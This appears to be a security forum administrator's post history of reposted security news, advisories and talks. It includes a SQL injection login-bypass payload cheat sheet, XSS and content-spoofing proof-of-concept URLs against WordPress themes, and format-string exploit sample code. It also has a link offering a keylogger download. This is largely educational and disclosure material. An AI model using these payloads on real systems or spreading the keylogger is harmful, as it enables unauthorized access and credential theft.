Nytro
Administrators

Everything posted by Nytro

  1. Kaspersky Warns of Malware Targeting Kindle Fire
    By Jeff Goldman | December 24, 2012

    Kaspersky's Roel Schouwenberg recently came across two fake apps in the Amazon App Store, "Internet Accelerator Speed Up" and "Shake Battery Charger," which claim to offer performance improvements, but don't do anything except deliver Airpush mobile ads.

    "It should come as no surprise that there are malicious apps in the Amazon App Store," Schouwenberg writes. "Amazon.com is incredibly popular and it's a very trivial step to also upload an app into their store. We detect these pieces of malware as HEUR:Hoax.AndroidOS.FakeBapp.a and have been in contact with Amazon.com about this. The apps were previously available in Google Play as well, but had been removed at an earlier time."

    "After a bit of online research, Schouwenberg found a Twitter account [matching the developer's name], and discovered that references in the app code to 'Bapplz' match references in the social feed," Infosecurity reports. "That in turn [led] to the discovery of a website called bapplz.com that hasn't been updated since August. 'Clearly, the project seems abandoned even if it's still making the author some money,' he noted."

    Source: Kaspersky Warns of Malware Targeting Kindle Fire - eSecurity Planet
  2. SQL Injection Authentication Bypass Cheat Sheet

    This list can be used by penetration testers when testing for SQL injection authentication bypass. A penetration tester can use it manually or through Burp in order to automate the process. The creator of this list is Dr. Emin İslam Tatlı (OWASP Board Member). If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

    or 1=1
    or 1=1--
    or 1=1#
    or 1=1/*
    admin' --
    admin' #
    admin'/*
    admin' or '1'='1
    admin' or '1'='1'--
    admin' or '1'='1'#
    admin' or '1'='1'/*
    admin'or 1=1 or ''='
    admin' or 1=1
    admin' or 1=1--
    admin' or 1=1#
    admin' or 1=1/*
    admin') or ('1'='1
    admin') or ('1'='1'--
    admin') or ('1'='1'#
    admin') or ('1'='1'/*
    admin') or '1'='1
    admin') or '1'='1'--
    admin') or '1'='1'#
    admin') or '1'='1'/*
    1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
    admin" --
    admin" #
    admin"/*
    admin" or "1"="1
    admin" or "1"="1"--
    admin" or "1"="1"#
    admin" or "1"="1"/*
    admin"or 1=1 or ""="
    admin" or 1=1
    admin" or 1=1--
    admin" or 1=1#
    admin" or 1=1/*
    admin") or ("1"="1
    admin") or ("1"="1"--
    admin") or ("1"="1"#
    admin") or ("1"="1"/*
    admin") or "1"="1
    admin") or "1"="1"--
    admin") or "1"="1"#
    admin") or "1"="1"/*
    1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

    Source: SQL Injection Authentication Bypass Cheat Sheet
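Each entry in the cheat sheet only works against a login query of a particular shape, which is what makes it useful for testing and also what makes the fix obvious. The following is an added example, not part of the cheat sheet or the original post: a toy SQLite login written two ways, once with the username concatenated into the WHERE clause and once with bound parameters, run against a handful of the entries above. The schema, the single account and its password are constructed for the demo; MD5 is used only because the cheat sheet's UNION entries assume it (81dc9bdb52d04dc20036dbd8313ed055 is md5("1234")), not as a recommendation for real password storage.

```python
import hashlib
import sqlite3

# Constructed sample data: one account, password hashed with MD5 to mirror the
# cheat sheet. A real application should use a slow, salted password hash.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.md5(b"correct horse").hexdigest()))
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into the WHERE clause: the pattern the cheat sheet targets."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password_hash = '" + pw_hash + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # A payload that breaks the SQL syntax is just a failed login (and a log entry).
        return None
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bound parameters: the input is data, never SQL, so quotes and comments are inert."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


# A few entries from the cheat sheet, used as the username with a wrong password.
PAYLOADS = [
    "admin' --",
    "admin' #",
    "admin'/*",
    "admin' or '1'='1",
    "admin' or '1'='1'--",
    "admin') or ('1'='1'--",
]


def run_cheatsheet(password="wrong"):
    """Returns {payload: (user returned by the vulnerable login, user returned by the safe one)}."""
    conn = make_db()
    return {p: (login_vulnerable(conn, p, password), login_safe(conn, p, password))
            for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in run_cheatsheet().items():
        print(f"{payload:28} concatenated -> {vuln!r:10} parameterized -> {safe!r}")
```

Two of the entries fail even against the concatenated query: SQLite does not recognise `#` as a comment (MySQL does), and the `)` variants only fit a query that wraps its condition in parentheses, which is why the cheat sheet carries every combination. The parameterized version rejects all of them because the quote character never reaches the SQL parser.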
  3. Hi tex,

    A long time has passed, I've heard many opinions and I still don't know for sure what happened, but I think the judicial system in Romania should be radically changed, because we all know it's on the floor. I'm sorry you spent Christmas like this, but I'm sure it will be fine because you are not to blame. It's sad that the "militia" doesn't tell the difference between a hosting provider and one of its clients... It was a blow for everyone, maybe because of the elections, maybe because the end of the year is coming and a line had to be drawn, we have no way of knowing, but what's certain is that mistakes were made. I didn't want to get too involved, because honestly I'm a bit afraid, especially since I reopened RST to do some good for the whole community and to show them that we're not giving up, but being an administrator of the "organised group RST" I have my reasons to be afraid. The point is that we're with you and I'm sure everything will turn out fine, I just hope things don't keep getting postponed, as I understand has happened in many cases.

    // Nytro
  4. Christmas gifts:

    Super-moderators:
    - Cheater
    - M2G

    Administrators:
    - begood
    - em
  5. Damn, if we left the IP 1.3.3.7 for everyone, there were problems logging in. So we chose the peasant's approach:

    $_SERVER['REMOTE_ADDR'] = (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254) . '.' . (string)rand(1,254);
  6. Nytro

    Test #1

    Zzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
  7. Nytro

    Test #1

    sdfdsfdsfdsdsf
  8. It's not him.
  9. To reassure all the paranoids, that is, those who think they are important even though nobody gives two cents for what they have (not) done, over these holidays, between Christmas and New Year's Eve, IPs will not be saved:

    mysql> update post set ipaddress = '1.3.3.7';
    Query OK, 390557 rows affected (18.36 sec)
    Rows matched: 390562  Changed: 390557  Warnings: 0

    mysql> update user set ipaddress = '1.3.3.7';
    Query OK, 99168 rows affected (1.55 sec)
    Rows matched: 99169  Changed: 99168  Warnings: 0

    After New Year's, if you're still shitting yourselves over who knows what you did, learn to use Tor, VPNs or anything else. Fuck off. I mean, Merry Christmas.
  10. Nytro

    Test #1

    Test
  11. Digital Keylogger v4.0.zip - Speedy Share - upload your files here
  12. So what the fuck are you guys doing?
  13. Effective Approaches To Web Application Security

    Description:

    Abstract

    This presentation will focus on new and interesting approaches to web application security problems posed by a continuous deployment environment. Specifically, this presentation will cover useful security systems such as automatic vulnerability and application fault detection, effective platform defenses for XSS/SQLi, practical security alerting mechanisms, and visualizations of security related data. This talk demonstrates how to create these systems using free tools that improve security posture without commercial security products.

    *****

    Speaker: Zane Lackey, Security Engineer Manager, Etsy

    Zane Lackey leads the security groups at Etsy, the world's marketplace of creative independent businesses. Prior to Etsy, Zane was a Senior Security Consultant at iSEC Partners with a focus in the fields of mobile and web application security. His research has been featured in notable media outlets such as the BBC, Associated Press, Forbes, Wired, CNET, SC Magazine and numerous others. A frequent speaker at top industry conferences, he has presented at BlackHat, RSA, Microsoft BlueHat, Toorcon, DeepSec, SANS, OWASP, guest lectured at NYU, and in 2010 was named as one of 12 prominent security researchers by Network World magazine. He is a contributing author of Mobile Application Security (McGraw-Hill), a co-author of Hacking Exposed: Web 2.0 (McGraw-Hill), and a contributing author/technical editor of Hacking VoIP (No Starch Press). He holds a Bachelor of Arts in Economics with a minor in Computer Science from the University of California, Davis.

    *****

    Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

    Original Source: Effective Approaches to Web Application Security - Zane Lackey on Vimeo

    Source: Effective Approaches To Web Application Security
  14. Cyberspace And Beyond - Evolution In Action

    Description:

    PDF: https://hacktivity.com/en/downloads/archives/221/

    Sir David Pepper was the Director of the Government Communications Headquarters (GCHQ), the UK Government's agency responsible for Signals Intelligence and electronic information security. He retired in July 2008, having taken up that post in April 2003. After taking a degree in Physics and a DPhil in Theoretical Physics at St John's College, Oxford, he joined GCHQ in 1972. He spent all his career there except for a spell in the Home Office in 1998-2000, where he was responsible for infrastructure and modernisation. Much of his time at GCHQ was spent managing intelligence production, but he also had spells as Finance Director and HR Director. As the Director, his focus was on leading transformational change, as GCHQ responded to the challenges of the Internet both in intelligence production and in meeting the new problems of cyber-security. Since retiring from GCHQ, he has been a member of the previous UK Government's National Security Forum, and held other non-executive positions including a role with Gloucestershire County Council. He is currently a member of the Advisory Board of Thales UK, and works with Deloitte on cyber risk and national security issues.

    Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

    Original Source:

    Source: Cyberspace And Beyond - Evolution In Action
  15. Security Code Review

    Description:

    His speciality is web application security. After a strong development past, his interest turned to security 7 years ago when he participated in a corporate web SSO development. Currently he is a trainer and auditor at Cloudbreaker Co.

    Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

    Original Source:

    Source: Security Code Review
  16. de4dot .NET deobfuscator and unpacker

    Description

    de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#. It will try its best to restore a packed and obfuscated assembly to almost the original assembly. Most of the obfuscation can be completely restored (e.g. string encryption), but symbol renaming is impossible to restore since the original names aren't (usually) part of the obfuscated assembly.

    Features

    Here's a pseudo-random list of the things it will do, depending on what obfuscator was used to obfuscate an assembly:

    - Inline methods. Some obfuscators move small parts of a method to another static method and call it.
    - Decrypt strings statically or dynamically.
    - Decrypt other constants. Some obfuscators can also encrypt other constants, such as all integers, all doubles, etc.
    - Decrypt methods statically or dynamically.
    - Remove proxy methods. Many obfuscators replace most/all call instructions with a call to a delegate. This delegate in turn calls the real method.
    - Rename symbols. Even though most symbols can't be restored, it will rename them to human readable strings. Sometimes, some of the original names can be restored, though.
    - Devirtualize virtualized code.
    - Decrypt resources. Many obfuscators have an option to encrypt .NET resources.
    - Decrypt embedded files. Many obfuscators have an option to embed and possibly encrypt/compress other assemblies.
    - Remove tamper detection code.
    - Remove anti-debug code.
    - Control flow deobfuscation. Many obfuscators modify the IL code so it looks like spaghetti code, making it very difficult to understand the code.
    - Restore class fields. Some obfuscators can move fields from one class to some other obfuscator-created class.
    - Convert a PE exe to a .NET exe. Some obfuscators wrap a .NET assembly inside a Win32 PE so a .NET decompiler can't read the file.
    - Remove most/all junk classes added by the obfuscator.
    - Fix some peverify errors. Many of the obfuscators are buggy and create unverifiable code by mistake.
    - Restore the types of method parameters and fields.

    Supported obfuscators/packers

    - Agile.NET (aka CliSecure)
    - Babel.NET
    - CodeFort
    - CodeVeil
    - CodeWall
    - CryptoObfuscator
    - DeepSea Obfuscator
    - Dotfuscator
    - .NET Reactor
    - Eazfuscator.NET
    - Goliath.NET
    - ILProtector
    - MaxtoCode
    - MPRESS
    - Rummage
    - Skater.NET
    - SmartAssembly
    - Spices.Net
    - Xenocode

    Some of the above obfuscators are rarely used (e.g. Goliath.NET), so they have had much less testing. Help me out by reporting bugs or problems you find.

    Download: https://bitbucket.org/0xd4d/de4dot/downloads

    Source: https://bitbucket.org/0xd4d/de4dot/overview
  17. Multiple vulnerabilities in multiple themes for WordPress

    From: "MustLive" <mustlive () websecurity com ua>
    Date: Sun, 23 Dec 2012 01:39:25 +0200

    Hello list!

    Some time ago, when I found vulnerabilities in the BuddyPress plugin for WordPress (particularly in the Affinity BuddyPress theme for it) with Rokbox, which I disclosed earlier, I also found multiple vulnerable themes for WP with Rokbox. So I want to warn you about multiple vulnerabilities in multiple themes for WordPress. These are themes developed by Rokbox's developers, and they put Rokbox (with JW Player, but without TimThumb) into their themes.

    These are Content Spoofing, Cross-Site Scripting, Full path disclosure and Information Leakage vulnerabilities. I disclosed vulnerabilities in JW Player in June and August (including in the commercial version JW Player Pro) and disclosed vulnerabilities in Rokbox in December. These vulnerabilities are similar to the vulnerabilities in the Affinity BuddyPress theme. I have also found many WP themes by other developers with Rokbox, but I will write about them separately, because they have many more holes.

    -------------------------
    Affected products:
    -------------------------

    Vulnerable are all WordPress themes by RocketTheme (during quick research I found 16 themes for WP, in addition to the above-mentioned theme for BP, but I suppose all their themes contain Rokbox with JW Player 4.4.198). They haven't removed this vulnerable version of JW Player from Rokbox, and so from any of their themes (for WP and BP), when I informed them in August.

    Here are the 16 vulnerable themes which I found:

    rt_afterburner_wp
    rt_refraction_wp
    rt_solarsentinel_wp
    rt_mixxmag_wp (Mixxmag)
    rt_iridium_wp
    rt_infuse_wp (infuse)
    rt_perihelion_wp
    rt_replicant2_wp
    rt_affinity_wp
    rt_nexus_wp
    rt_sentinel
    rt_mynxx_wp_vestnikp
    rt_mynxx_wp (rt.mynxx.wp)
    rt_moxy_wp
    rt_terrantribune_wp
    rt_meridian_wp

    They will be added to the 94 vulnerable themes for WordPress in which I have found vulnerabilities (http://websecurity.com.ua/4915/). In Google's index there are now up to 634000 pages with Rokbox at WP sites. So there are a lot of vulnerable themes and web sites with these themes.

    ----------
    Details:
    ----------

    The paths for these themes are the following:

    http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf
    http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf

    Content Spoofing (WASC-12):

    In the parameter file either video or audio files can be set. The swf file of JW Player accepts arbitrary addresses in the parameters file and image, which allows spoofing the content of the flash file, i.e. by setting addresses of video (audio) and/or image files from another site.

    http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
    http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv?=1.jpg

    Content Spoofing (WASC-12):

    The swf file of JW Player accepts arbitrary addresses in the parameter config, which allows spoofing the content of the flash file, i.e. by setting the address of a config file from another site (the parameters file and image in the xml file accept arbitrary addresses). For loading a config file from another site it needs to have crossdomain.xml.

    http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

    1.xml

    <config>
    <file>1.flv</file>
    <image>1.jpg</image>
    </config>

    Content Spoofing (WASC-12):

    http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

    XSS (WASC-08):

    http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

    Full path disclosure (WASC-13):

    In all these themes there is FPD in index.php (http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for other themes), which works at default PHP settings. Also there are potentially FPDs in other php files of these themes.

    Information Leakage (WASC-13):

    There are sites with the rt_mixxmag_wp theme which have an error log with full paths.

    http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

    ------------
    Timeline:
    ------------

    2012.05.29 - informed developers of JW Player.
    2012.06.06 - disclosed at my site about JW Player.
    2012.08.18 - informed developers about new holes in JW Player Pro.
    2012.08.23 - disclosed at my site about JW Player Pro.
    2012.08.28 - informed developers of Rokbox.
    2012.12.14 - disclosed at my site about Rokbox.
    2012.12.23 - disclosed to the lists about multiple themes for WordPress with Rokbox.

    Best wishes & regards,
    MustLive
    Administrator of Websecurity web site
    http://websecurity.com.ua

    Source: http://seclists.org/fulldisclosure/2012/Dec/236
  18. How to explain Hash DoS to your parents by using cats

    Published December 20th, 2012 by Barney Desmond

    We came across this interesting article recently; it's about how an attacker can perform a denial-of-service attack by feeding perverse input to a system that uses weak hashing algorithms. This is referred to as a Hash DoS, and the specific target mentioned in the article is btrfs. btrfs is a next-gen filesystem that's expected to replace ext3/4 in Linux. It's still considered experimental but is quite usable and maturing fast. This article piqued our interest because we're using btrfs "for reals" here at Anchor.

    It's well and good to say that, but the article isn't very exciting unless you have a background in computer science. How would you explain Hash DoS to your parents, who probably don't have a CompSci background? This is the internet, so the answer is cats.

    Welcome to Purrfect Kitty Daycare

    Let's pretend that you run a daycare centre for pampered pusses. Doting owners drop their kitty off on the way to work each morning, and pick them up in the afternoon. You look after the pussies fantastically, so business is growing by leaps and bounds with more moggies every week. You can't look after all the cats, so you hire some enthusiastic helpers.

    Fast forward a few months: you now have 26 cat-minders working for you while you manage the business. Each minder has their own space to work in. To divide the work, you assign cats to minders based on the cat's name: all cats whose name begins with the letter 'A' go to minder no. 1, the cats whose name starts with the letter 'B' go to minder no. 2, and so on. When owners arrive to drop off or pick up their furry bundle of joy, they know exactly which room to go to! It's super simple and does the job nicely.

    Your offices look something like this:

    Assume, for the sake of argument, that you moved into larger premises very quickly.

    What you've implemented is called a hash function. It's really basic but it does the job. As long as a cat has a name, there's a room for it, and you always know exactly where to find a cat. When you use a hash function to distribute objects like this, each object (cat) goes into a bucket (room).

    Kitty Kollisions

    Your rooms don't fill up evenly; this is to be expected. You might have a few cats in Room A (Alice, Alison, Amanda), and only one in Room X (Xerxes). Room A has what's called a hash collision. Finding Xerxes in the afternoon is easy, he has the whole room to himself. When Alice's owner comes to pick her up, the attendant at the front desk has to ask what she looks like (or remember from previous visits). No big deal, we just have to check all the cats in Room A until we find Alice. It takes a couple of seconds. Sometimes you'll get a lot of cats in one room, maybe a dozen, but you can still work out which one you're looking for with a little effort. You've got ninety-nine problems but cats ain't one.

    Moggy Mischief

    A rival appears! Kitty Kare has opened up across town and is looking to put you out of business. They've seen your hashing function in action and know how it works. They're going to use it against you, because they're evil.

    First, they need cats. Lots of cats. Maybe they pick up strays off the street, or just get kittens from the internet. It doesn't matter how, but they've got over nine thousand cats. Now they give them all names starting with "Mr": Mr Bigglesworth, Mr Fluffles, Mr Mac, Mr Pete, Mr Lincoln, Mr MoonUnit, etc. The list is practically infinite. Each cat gets a little engraved nametag on its collar and goes on its catty way.

    They bring all the cats to Purrfect Kitty Daycare. Your staff are very smart people, and manage to handle the tsunami of tabbies by moving a few walls around to make enough room. It slows them down a bit, and your customers get irate that they have to wait to drop off their cat, but they get there in the end.

    Your offices now look something like this:

    Phew, it's a good thing you invested in a rapidly reconfigurable walling system!

    Meltdown

    Real mayhem arrives in the afternoon: evil employees from Kitty Kare return and ask to pick up ALL the cats. One by one.

    Placing a cat in the room takes a roughly fixed amount of time, called constant time when dealing with algorithms, mathematically written as O(1). Finding a particular cat means going to the room and checking all the cats there. The more cats there are, the longer it takes. This is called linear time, written as O(n). On average, your staff have to search about 4,500 cats (half of all the cats in the room) before they happen to find the right one. Things get better as some of the cats are returned to their (evil) owners, but it's a bad situation for a long time.

    Your genuine customers are quite angry and upset, and it's well past midnight by the time you knock off and go home. You get home that night and have dreams. Bad dreams, about being overwhelmed by cats.

    You've just been Hash DoS'd, with cats.

    Fixing those felines

    In short, the answer to this problem is to use a hash function that isn't vulnerable to this sort of attack. A cryptographic hash function is a special type of hash function that makes it difficult to create specifically-chosen collisions like the one shown here. This won't completely prevent the evil attacker from hammering away and trying to produce cat names that happen to cause collisions, but it makes life a lot harder for them. A full-blown cryptographic hash function like SHA-1 would probably be overkill for your kitty daycare centre, but it's the right line of thinking. So long as your hash function can evenly distribute cats into rooms, all you need to worry about is having enough staff to look after them all. Purrfect!

    Source: How to explain Hash DoS to your parents by using cats | Anchor Web Hosting Blog
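To make the O(1) versus O(n) cost concrete, here is an added Python simulation of the daycare, not code from the Anchor article. `first_letter_room` is the article's bucket-by-first-letter hash; `keyed_room` stands in for the fix, a keyed hash (BLAKE2b with a secret key, a stand-in for the keyed or randomised hashing that hardened hash tables use) whose room assignment the attacker cannot predict without the key. The attacker's cat names are constructed; the simulation drops all of them off and then has the attacker pick them up in the worst order for a list, counting how many cats the staff must check each time.

```python
import hashlib
import os

ROOMS = 26


def first_letter_room(name):
    """The daycare's hash: room number from the first letter ('a'..'z' -> 0..25).
    Every name the attacker chooses starts with 'M', so every cat lands in room 12."""
    return ord(name[0].lower()) - ord("a")


def keyed_room(name, key):
    """Keyed hash reduced to a room number. Without the key, the attacker cannot
    choose names that collide, so the rooms fill up roughly evenly."""
    digest = hashlib.blake2b(name.encode(), key=key, digest_size=8).digest()
    return int.from_bytes(digest, "big") % ROOMS


class Daycare:
    def __init__(self, room_of):
        self.room_of = room_of                      # the hash function in use
        self.rooms = [[] for _ in range(ROOMS)]     # one list of cats per room

    def drop_off(self, name):
        self.rooms[self.room_of(name)].append(name)  # O(1): straight to the room

    def pick_up(self, name):
        """Staff check the cats in the room one by one.
        Returns (name or None, number of cats checked)."""
        room = self.rooms[self.room_of(name)]
        for checked, cat in enumerate(room, 1):
            if cat == name:
                del room[checked - 1]
                return cat, checked
        return None, len(room)

    def largest_room(self):
        return max(len(room) for room in self.rooms)


def kitty_kare_names(n):
    """Constructed adversarial names: all start with 'Mr', like the article's."""
    return [f"Mr Cat{i}" for i in range(n)]


def simulate(n=9001, key=None):
    """Drop off n attacker-chosen cats under each hash, then pick them all up in
    reverse drop-off order (each pick-up scans its whole room). Returns the largest
    room and the average number of cats checked per pick-up for both hashes."""
    key = key if key is not None else os.urandom(16)
    names = kitty_kare_names(n)
    result = {}
    for label, room_of in (("first_letter", first_letter_room),
                           ("keyed", lambda name: keyed_room(name, key))):
        daycare = Daycare(room_of)
        for name in names:
            daycare.drop_off(name)
        largest = daycare.largest_room()
        total_checked = 0
        for name in reversed(names):
            _, checked = daycare.pick_up(name)
            total_checked += checked
        result[label] = {"largest_room": largest,
                         "avg_comparisons": total_checked / n}
    return result


if __name__ == "__main__":
    for label, stats in simulate().items():
        print(f"{label:13} largest room: {stats['largest_room']:5}  "
              f"average cats checked per pick-up: {stats['avg_comparisons']:.0f}")
```

With the first-letter hash all 9001 cats share one room and the average pick-up checks about 4,500 of them, the figure the article quotes; with the keyed hash the same names spread over the 26 rooms and a pick-up checks a few hundred at most. The attacker's input is identical in both runs; only the hash changed.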
  19. Format Strings: Is Objective-C Objectively Safer?

    HP_SSR | August 9, 2012 - last edited August 15, 2012

    With the explosion of mobile devices came mobile applications, and with the mobile applications came a plethora of new security and privacy concerns. If you've been following this blog or our products, you probably know that we just released our first Objective-C rulepacks, with a lot more support planned in the future. To kick things off, let's talk about one of the vulnerabilities that our Objective-C rulepacks can detect: format string flaws.

    A common misconception is that Objective-C is a newer language compared to C and C++, and is therefore immune to many of the classic C vulnerabilities such as buffer overflows. In the C and C++ world, one cousin of the well-known buffer overflow exploit is format string attacks. Since Objective-C also supports format strings, does that mean that its applications are vulnerable as well? Let's first review how C/C++-style format string attacks work, then compare these to what Objective-C lets us do.

    A string format function, such as printf(), takes in a format string and a variable list of arguments. Normally (with the exception of the %n specifier, more on that later), the format specifiers in the string are replaced with the values of the respective arguments. What happens if there are more specifiers than there are arguments? For example,

        printf("%d%d%d%d%d\n", val);

    C and C++ will gladly continue to pop values off the stack until it fills in every value for every format specifier. What if an attacker is able to control the format string? At best, the program will crash or function incorrectly due to the damaged call stack. At worst, it can reveal sensitive information stored in local variables or passed as arguments to functions.

    The story gets worse. C and C++ support the %n specifier, which writes a value, namely the number of bytes written thus far, back to the corresponding variable. By controlling the number of bytes written and storing the value of %n, we can write any value back to the stack, including the address of any attacker-controlled malicious code. (To avoid having to write millions of characters just to form a 32-bit address, we can instead write %n four times, a single byte at a time.) If we can also manipulate the stack to fool the program into treating the value as the return pointer, then we can force the program to run our malicious code, not unlike a buffer overflow exploit.

    So how much of this applies to Objective-C? The good news is that format string methods introduced by Objective-C do not allow the %n specifier, so there are no known ways to execute arbitrary code using format strings. The bad news is that Objective-C attempts to be backwards-compatible with C/C++ libraries, continuing to allow the old %n-style code execution exploits. Nonetheless, even for the newer Objective-C-specific format string methods, using excess format specifiers to pop values off the stack still works:

        #import <Cocoa/Cocoa.h>   // header needed to build the sample as a Cocoa program

        void myfunc(NSString *in) {
            NSLog(in);            // the argument itself is used as the format string
            NSLog(@"Inside myfunc");
        }

        int main(int argc, char *argv[]) {
            NSString *test = @"%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n";
            myfunc(test);
            return NSApplicationMain(argc, (const char **) argv);
        }

    The output is as follows:

        (gdb)
        2012-02-13 22:12:12.525 objc[12983:a0f] 5fbff860.5fbff870.5fbff928.00000012.00000000.00000000.00002070.5fbff840
        000017e8.5fbff860.00000000.5fbff848.00002070.5fbff850.00001784.00000000
        (gdb) info args
        in = (NSString *) 0x100002070
        (gdb)

    Note the address of the string test, 00002070, gets printed twice in the output, presumably because it is passed twice as an argument: once to myfunc, and again to NSLog. I should also note that in constructing the above test code, the program has also crashed several times with an EXC_BAD_ACCESS signal, further suggesting that the format string is corrupting the stack pointer.

    I hope the above evidence is convincing enough to show that Objective-C does not perform any safety checks on format strings, letting them manipulate the call stack easily. The next reasonable question: how exactly can this be exploited? What might vulnerable code in an application look like? Consider the following code snippet:

        - (BOOL)application:(UIApplication *)application openURL:(NSURL *)url
            sourceApplication:(NSString *)sourceApplication annotation:(id)annotation {
            // Write to debugging log
            NSLog(@"++ Entered application");
            NSString *urlquery = [url query];
            NSLog(urlquery);      // attacker-supplied query string used as the format string
            ...
        }

    This is one of the most common mistakes when using NSLog, which in turn can lead to a format string vulnerability. According to the official documentation, NSLog()'s first parameter is not a simple string, but in fact a format string. A rogue (or compromised) process might take advantage of this vulnerability by launching the app via its registered URL scheme and supplying a URL with extraneous format specifiers. When the program reaches the line NSLog(urlquery), the NSLog() method now expects the values to fill in for these specifiers. It does this by gladly reaching backwards into the call stack, which corrupts the state of the stack. This causes the rest of the program to run incorrectly or eventually crash.

    So in short, while Objective-C format strings manage to avoid some of the more heinous exploits that allow for arbitrary code execution, they are still vulnerable to stack manipulation. Attackers can still crash your program at best, and dump sensitive data at worst. Avoid using legacy C/C++ format string methods if possible; these are still vulnerable to the code execution exploits of old. In general, be careful when working with format strings; always make sure there are equal numbers of format specifiers and arguments. More importantly, do not let sources outside of your control, such as data and messages from other applications or web services, control any part of your format strings.

    Posted by sarah at 12:00 PM

    Source: HP Communities - Format Strings: Is Objective-C Objectively Safer? - Enterprise Business Community
  20. Foreign Code Detection on the Windows/X86 Platform

    Susanta Nanda, Wei Li, Lap-Chung Lam, Tzi-cker Chiueh
    {susanta,weili,lclam,chiueh}@cs.sunysb.edu
    Department of Computer Science, SUNY at Stony Brook, Stony Brook, NY 11794-4400

    Abstract

    As new attacks against Windows-based machines emerge almost on a daily basis, there is an increasing need to "lock down" individual users' desktop machines in corporate computing environments. One particular way to lock down a user computer is to guarantee that only authorized binary programs are allowed to run on that computer. A major advantage of this approach is that binaries downloaded without the user's knowledge, such as spyware, adware, or code entering through buffer overflow attacks, can never run on computers that are locked down this way. This paper presents the design, implementation and evaluation of FOOD, a foreign code detection system specifically for the Windows/X86 platform, where foreign code is defined as any binary programs that do not go through an authorized installation procedure. FOOD verifies the legitimacy of binary images involved in process creation and library loading to ensure that only authorized binaries are used in these operations. In addition, FOOD checks the target address of every indirect branch instruction in Windows binaries to prevent illegitimate control transfers to either dynamically injected mobile code or pre-existing library functions that are potentially damaging. Combined together, these techniques strictly prevent the execution of any foreign code. Experiments with a fully working FOOD prototype show that it can indeed stop all spyware and buffer overflow attacks we tested, and its worst-case run-time performance overhead associated with foreign code detection is less than 35%.

    Download: www.acsac.org/2006/papers/86.pdf
  21. Address-Space Randomization for Windows Systems

    Lixin Li and James E. Just, Global InfoTek, Inc., Reston, VA, {nli,jjust}@globalinfotek.com
    R. Sekar, Stony Brook University, Stony Brook, NY, sekar@cs.stonybrook.edu

    Abstract

